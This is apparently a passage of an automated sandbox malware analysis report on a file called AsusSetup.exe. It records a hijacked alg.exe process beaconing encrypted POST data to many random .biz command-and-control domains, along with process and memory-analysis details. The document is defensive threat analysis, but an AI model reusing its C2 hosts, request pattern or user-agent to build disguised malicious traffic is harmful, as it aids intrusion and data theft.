                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:57.969492912 CET | 778 | OUT | Data Raw: c9 9d a9 9b 71 1c 05 3d fe 02 00 00 d9 27 e8 23 c6 d3 46 20 47 cc 3a 5a 24 dc 03 67 39 64 27 49 79 c3 38 78 c1 1a fc 73 c8 a5 f6 01 f0 32 e1 6c 7a 41 b2 99 80 3b c2 1e b8 a6 ca f3 28 6c 5c 67 de 79 02 e9 98 74 e1 fe 9d ff cf 10 cc 6a cc 4b 74 c3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q='#F G:Z$g9d'Iy8xs2lzA;(l\gytjKtl,AHGyWi~g<}]F9@\;WLx_!_o&3TO8N@"d:x7J|vW;+9sBI~m-b{8f/'Pm}dxLj?


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50089 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:58.707676888 CET | 349 | OUT | POST /vhkxrtp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:58.707676888 CET | 778 | OUT | Data Raw: 26 4f 97 a4 43 c8 00 31 fe 02 00 00 77 96 fb 41 c7 88 14 b4 13 fd 0a d9 af aa b5 81 39 2e fd 99 bb 8f 3b fe f6 fe b5 84 23 68 ee 56 b1 f9 91 17 c0 9b ac 43 f8 45 09 7c 43 b9 6a 24 e9 7a 76 ff 8e 36 19 ef b1 25 d6 27 5f 71 da 48 b8 97 4f c1 7d 09
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &OC1wA9.;#hVCE|Cj$zv6%'_qHO}<IP_qe@wJl\q`\c,77|YcZmU_B@IXX|O}v~TD4!&;{grl|/x)IG}}u|,xn[e'~);eV
Oct 28, 2024 16:38:59.369520903 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5df0915435aa647c68e9be668215ff49|155.94.241.188|1730129939|1730129939|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50090 | 18.141.10.107 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:59.389998913 CET | 351 | OUT | POST /chcelg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:59.390033960 CET | 778 | OUT | Data Raw: 35 12 22 ab d3 42 af ee fe 02 00 00 66 5f 00 00 01 d6 8f 08 68 d3 e0 e3 3b bd 4c 10 d6 74 40 84 6f 99 98 f6 be 1a 87 9d aa b9 57 6d 51 97 36 81 45 da 72 4f b6 57 20 37 4b a9 0f de 38 c7 4b 8d 91 86 52 af 75 85 90 de 33 3c c8 94 85 30 d0 94 81 0d
Oct 28, 2024 16:39:00.845782042 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:39:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bdd9c9384dc4b3b35ea3fabe2c7da7d3|155.94.241.188|1730129940|1730129940|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50091 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:00.867338896 CET | 356 | OUT | POST /vwhigqqruvsekwy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:39:00.867340088 CET | 778 | OUT | Data Raw: 6e a4 de 8f 8f c0 4d 3c fe 02 00 00 74 91 ba 1c ea ac dc 79 d4 a2 b8 23 a1 7f c6 78 96 df 37 22 57 98 41 75 9a c8 17 55 56 7e 38 8f 91 b9 c2 02 e1 d0 29 6c 84 63 7d eb 45 f0 fd cd 10 d2 aa 05 4e d0 40 ca 13 f4 a9 1e 5e 09 96 de 84 cb dc 75 aa 96


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50092 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:01.350792885 CET | 348 | OUT | POST /gsepgks HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:39:01.350812912 CET | 778 | OUT | Data Raw: e6 40 ae 22 fd 74 e8 35 fe 02 00 00 b8 b8 a8 da ad 7b a7 6a 0a b5 d8 89 f9 bf 58 39 f9 43 79 03 24 da 28 b0 31 2d d1 a4 bf d6 d9 9d a3 62 65 18 2f 5c 00 f4 00 0b 87 ce 19 6f 4a 65 23 71 59 e6 17 6f dd 85 5c c5 70 91 c8 ff 07 85 53 28 16 09 57 17
Oct 28, 2024 16:39:02.025896072 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:39:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=78b2b0df7212dc80942251df94886f32|155.94.241.188|1730129941|1730129941|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 50093 | 172.234.222.138 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:02.050962925 CET | 351 | OUT | POST /mswwap HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:39:02.050992966 CET | 778 | OUT | Data Raw: f5 03 39 2a 8e ee 97 f2 fe 02 00 00 ed d0 0a 27 77 56 05 74 1b f6 5d d8 da 1d 9f 3d 4a 80 2d 62 26 3f 13 82 a9 10 7e 32 ae d7 83 5f 98 2c b2 e8 61 d6 7d 9e e6 07 f1 85 cb f4 65 84 13 ba 94 19 2e c4 76 15 12 1a fb f7 1b 8b 69 13 1f d3 dc e4 a2 0b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9*'wVt]=J-b&?~2_,a}e.vi!RZ`h[fu\pPW^56&787Vi`YoPM-:&x`Tv97!E8'i@'g_OCv31:d&964NQbm


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50094 | 172.234.222.138 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:02.740770102 CET | 350 | OUT | POST /raodt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50095 | 54.244.188.177 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:03.454838037 CET | 344 | OUT | POST /x HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:39:04.321760893 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:39:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=31dfac81c5b4cb6934b3f42684a1b34c|155.94.241.188|1730129944|1730129944|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50096 | 44.221.84.105 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:04.372863054 CET | 348 | OUT | POST /yfvdkcw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:39:05.034065962 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:39:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0a4295f622b74069eb0049bd3b2ba13c|155.94.241.188|1730129944|1730129944|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50097 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:05.060811996 CET | 358 | OUT | POST /yjhdmcatglnakd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50098 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:05.338185072 CET | 359 | OUT | POST /ujivskprejscmpv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:39:05.338402987 CET | 778 | OUT | Data Raw: 2e 5b e3 cf 73 7e e9 b1 fe 02 00 00 2e 64 a1 91 a5 3a 16 99 d0 f6 6f 8f 22 a9 d4 3a 28 8a 9e 7e c6 f1 e4 d1 f0 aa e9 6f 95 fd 0a fc 29 bb b1 09 42 76 40 13 23 66 a6 d6 44 8c d0 0e 16 77 d4 3a c6 aa 96 37 6d f9 63 93 21 66 62 7c f8 bd 6d ed 6d 9e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .[s~.d:o":(~o)Bv@#fDw:7mc!fb|mmyjA(ky~r!=n28"du{ZRe+#1<S{~+t'e|rB+QlG&[*$tZ"$^2>A-^~?k
Oct 28, 2024 16:39:06.177078962 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4c6d5b085cb7eeaa4c07d4c802561397|155.94.241.188|1730129946|1730129946|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50099 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:06.218760014 CET | 344 | OUT | POST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:39:06.218786001 CET | 778 | OUT | Data Raw: a0 7e a6 56 7d 53 24 25 fe 02 00 00 69 93 bf 04 ca c1 d1 b1 6e 0b 5b 38 bc c3 85 d2 44 53 ef f4 65 67 66 7a 57 af de 3e d7 a5 b8 31 b6 97 da 5e e0 87 91 66 7b d7 da 75 62 e1 3e b4 ae 07 82 df 06 8f d8 1f fa 89 ae cb 0a 11 8c ee a8 fa 93 6e 87 f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~V}S$%in[8DSegfzW>1^f{ub>nh&\Z(*2T!N?b%q1 .BJ=*qh[E~z'hzunV`V,?Pz49s0&-KT9A_Nm.ge^FW4fiab
Oct 28, 2024 16:39:07.048444986 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69c9c57ba4b1a34d30b0da23afaec5d7|155.94.241.188|1730129946|1730129946|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50100 | 34.246.200.160 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:39:07.069463968 CET | 357 | OUT | POST /yamkuqcyqisosmtq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:39:07.069488049 CET | 778 | OUT | Data Raw: e0 d6 ae e8 28 12 01 1e fe 02 00 00 e2 43 bc 7b fa 1a ed f4 e9 f0 a8 ac 31 63 ce 50 ca 33 8f ce 72 43 da ed 1e 66 aa 30 ba 9c 12 44 7b 72 e1 da d7 a6 17 aa 05 41 8b 9f b9 34 59 47 5f 08 95 8e e6 2e 1a 89 50 a5 f4 2c f9 ee 83 c9 1c 43 1c f8 4e 4f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (C{1cP3rCf0D{rA4YG_.P,CNOHT+.)xJ%C}%~nNE=#$w\eedR-<;CfSg{&x'=2veYCM`cMM'xC7|1J<
Oct 28, 2024 16:39:08.046047926 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:39:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=efb14b80b7705eb38d2c0bd72d2332ef|155.94.241.188|1730129947|1730129947|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0



                                                                                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:02
Start date: 28/10/2024
Path: C:\Users\user\Desktop\AsusSetup.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\AsusSetup.exe"
Imagebase: 0x140000000
File size: 5'251'072 bytes
MD5 hash: 13BF2819401D2F983FFF90C1960831B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 11:37:02
Start date: 28/10/2024
Path: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase: 0x400000
File size: 1'445'888 bytes
MD5 hash: B304B3F52DE20CFC59D49162F1E99EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: false

Target ID: 2
Start time: 11:37:03
Start date: 28/10/2024
Path: C:\Windows\System32\alg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\alg.exe
Imagebase: 0x140000000
File size: 1'381'376 bytes
MD5 hash: 0E2255EDBB351BDA0949D09F88FA226E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 3
Start time: 11:37:04
Start date: 28/10/2024
Path: C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 138'056 bytes
MD5 hash: BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 11:37:04
Start date: 28/10/2024
Path: C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 174'408 bytes
MD5 hash: E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 11:37:04
Start date: 28/10/2024
Path: C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 154'952 bytes
MD5 hash: 2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:04
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8DF9B4C3E64A3509DEE72C0E8333DDA6
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:05
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0EC424B89B232FD9D839942FBC5274E2
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                        Start time:11:37:08
                                                                                                                                                                                                                                                                                                                                                                                        Start date:28/10/2024
                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                        File size:1'512'448 bytes
                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:DF7731CD51167F1E9F73863D919CAC1B
                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true


Execution Graph

Execution Coverage:11.9%
Dynamic/Decrypted Code Coverage:98.1%
Signature Coverage:1.4%
Total number of Nodes:213
Total number of Limit Nodes:30
Memory Dump Source
• Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
Similarity

Control-flow Graph (graph not reproduced; API calls labelled on its nodes: CloseHandle, GetTokenInformation)
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:

Control-flow Graph (graph not reproduced; API calls labelled on its nodes: CreateThread, CloseHandle)
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
